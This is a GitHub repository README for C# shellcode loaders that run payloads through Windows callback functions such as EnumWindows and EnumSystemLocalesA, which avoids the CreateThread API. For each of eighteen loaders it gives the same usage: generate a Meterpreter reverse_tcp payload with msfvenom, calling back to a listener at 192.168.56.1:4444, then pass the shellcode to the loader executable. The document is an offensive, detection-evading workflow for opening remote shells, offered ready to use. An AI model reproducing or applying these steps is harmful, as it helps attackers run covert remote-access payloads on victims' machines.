Skip to content

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)

Notifications You must be signed in to change notification settings

DamonMohammadbagher/NativePayload_CBT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

58 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

NativePayload_CBT

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions, without CreateThread Native API)

Note: These C# Codes Tested by .Net Framework 3.5 or 4.0 only ;) & some of Codes are ready but i will Publish almost all of them from S4R1N & ChaitanyaHaritash C++ repo soon...

Note: These Useful Techniques made by Security Researcher "@S4R1N" also Codes [13,14,15] made by Security Researcher "Chaitanya Haritash"

Special Thanks to "S4R1N" for Original C++ Source: https://github.com/S4R1N/AlternativeShellcodeExec

Special Thanks to "Chaitanya Haritash" for Original C++ Source: https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection

Video: https://www.youtube.com/watch?v=k473K7lWc5Q


My article for Call/Invoke C# Async Codes/Methods via Native Callback Functions (NativePayload_AsyncM* Codes)

Link1: https://damonmohammadbagher.github.io/Posts/29mar2021x.html

Link2: https://www.linkedin.com/pulse/callinvoke-async-c-method-via-callback-function-apis-mohammadbagher/

!    NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)
!    NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)
!    NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)

C# Codes: "New C# codes for Callback Functions will publish here soon..."

+    1. NativePayload_ImageGetDigestStream.cs
+    2. NativePayload_EnumWindows.cs
+    3. NativePayload_EnumWindowStationsW.cs
+    4. NativePayload_EnumResourceTypesW.cs
+    5. NativePayload_EnumChildWindows.cs
+    6. NativePayload_EnumDisplayMonitors.cs
+    7. NativePayload_EnumPageFilesW.cs
+    8. NativePayload_EnumPropsExW.cs
+    9. NativePayload_EnumerateLoadedModules.cs
+    10. NativePayload_CreateThreadPoolWait.cs
+    11. NativePayload_CreateTimerQueueTimer.cs
+    12. NativePayload_SymInitialize.cs
+    13. NativePayload_EnumSystemCodePagesA.cs  (by ChaitanyaHaritash)
+    14. NativePayload_EnumSystemLocalesA.cs  (by ChaitanyaHaritash)
+    15. NativePayload_EnumUILanguagesA.cs  (by ChaitanyaHaritash)
!    16. NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)
!    17. NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)
!    18. NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)

NativePayload_CBT.cs (Some of Callback Function Codes/Techniques in one code)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CBT.exe [1,2,3,4,5] [payload...]
Techniques: 1 => ImageGetDigestStream , 2 => EnumWindows , 3 => EnumWindowStationsW , 4 => EnumResourceTypesW , 5 => EnumChildWindows 
example: NativePayload_CBT.exe 3 "fc,48,00,87,00,...."


  1. NativePayload_ImageGetDigestStream.cs (Callback Functions Technique via ImageGetDigestStream Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_ImageGetDigestStream.exe  [payload...]
example: NativePayload_ImageGetDigestStream.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumWindows.cs (Callback Functions Technique via EnumWindows Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumWindows.exe  [payload...]
example: NativePayload_EnumWindows.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumWindowStationsW.cs (Callback Functions Technique via EnumWindowStationsW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumWindowStationsW.exe  [payload...]
example: NativePayload_EnumWindowStationsW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumResourceTypesW.cs (Callback Functions Technique via EnumResourceTypesW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumResourceTypesW.exe  [payload...]
example: NativePayload_EnumResourceTypesW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumChildWindows.cs (Callback Functions Technique via EnumChildWindows Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumChildWindows.exe  [payload...]
example: NativePayload_EnumChildWindows.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumDisplayMonitors.exe  [payload...]
example: NativePayload_EnumDisplayMonitors.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumPageFilesW.cs (Callback Functions Technique via EnumPageFilesW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumPageFilesW.exe  [payload...]
example: NativePayload_EnumPageFilesW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumPropsExW.cs (Callback Functions Technique via EnumPropsExW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumPropsExW.exe  [payload...]
example: NativePayload_EnumPropsExW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumerateLoadedModules.cs (Callback Functions Technique via EnumerateLoadedModules/W64 Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumerateLoadedModules.exe  [payload...]
example: NativePayload_EnumerateLoadedModules.exe "fc,48,00,87,00,...."


  1. NativePayload_CreateThreadPoolWait.cs (Callback Functions Technique via CreateThreadPoolWait Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CreateThreadPoolWait.exe  [payload...]
example: NativePayload_CreateThreadPoolWait.exe "fc,48,00,87,00,...."


  1. NativePayload_CreateTimerQueueTimer.cs (Callback Functions Technique via CreateTimerQueueTimer Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CreateTimerQueueTimer.exe  [payload...]
example: NativePayload_CreateTimerQueueTimer.exe "fc,48,00,87,00,...."


  1. NativePayload_SymInitialize.cs (Callback Functions Technique via SymInitialize Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_SymInitialize.exe  [payload...]
example: NativePayload_SymInitialize.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumSystemCodePagesA.cs (Callback Functions Technique via EnumSystemCodePagesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumSystemCodePagesA.exe  [payload...]
example: NativePayload_EnumSystemCodePagesA.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumSystemLocalesA.exe  [payload...]
example: NativePayload_EnumSystemLocalesA.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumUILanguagesA.cs (Callback Functions Technique via EnumUILanguagesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumUILanguagesA.exe  [payload...]
example: NativePayload_EnumUILanguagesA.exe "fc,48,00,87,00,...."


  1. NativePayload_AsyncMethodEUILA.cs (Callback Functions Technique via EnumUILanguagesA API + Async Csharp Method)

Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMethodEUILA.exe  [payload...]
example: NativePayload_AsyncMethodEUILA.exe "fc,48,00,87,00,...."


  1. NativePayload_AsyncMEnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA API + Async Csharp Method)

Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMEnumSystemLocalesA.exe  [payload...]
example: NativePayload_AsyncMEnumSystemLocalesA.exe "fc,48,00,87,00,...."


  1. NativePayload_AsyncMEnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors API + Async Csharp Method)

Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMEnumDisplayMonitors.exe  [payload...]
example: NativePayload_AsyncMEnumDisplayMonitors.exe "fc,48,00,87,00,...."


About

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages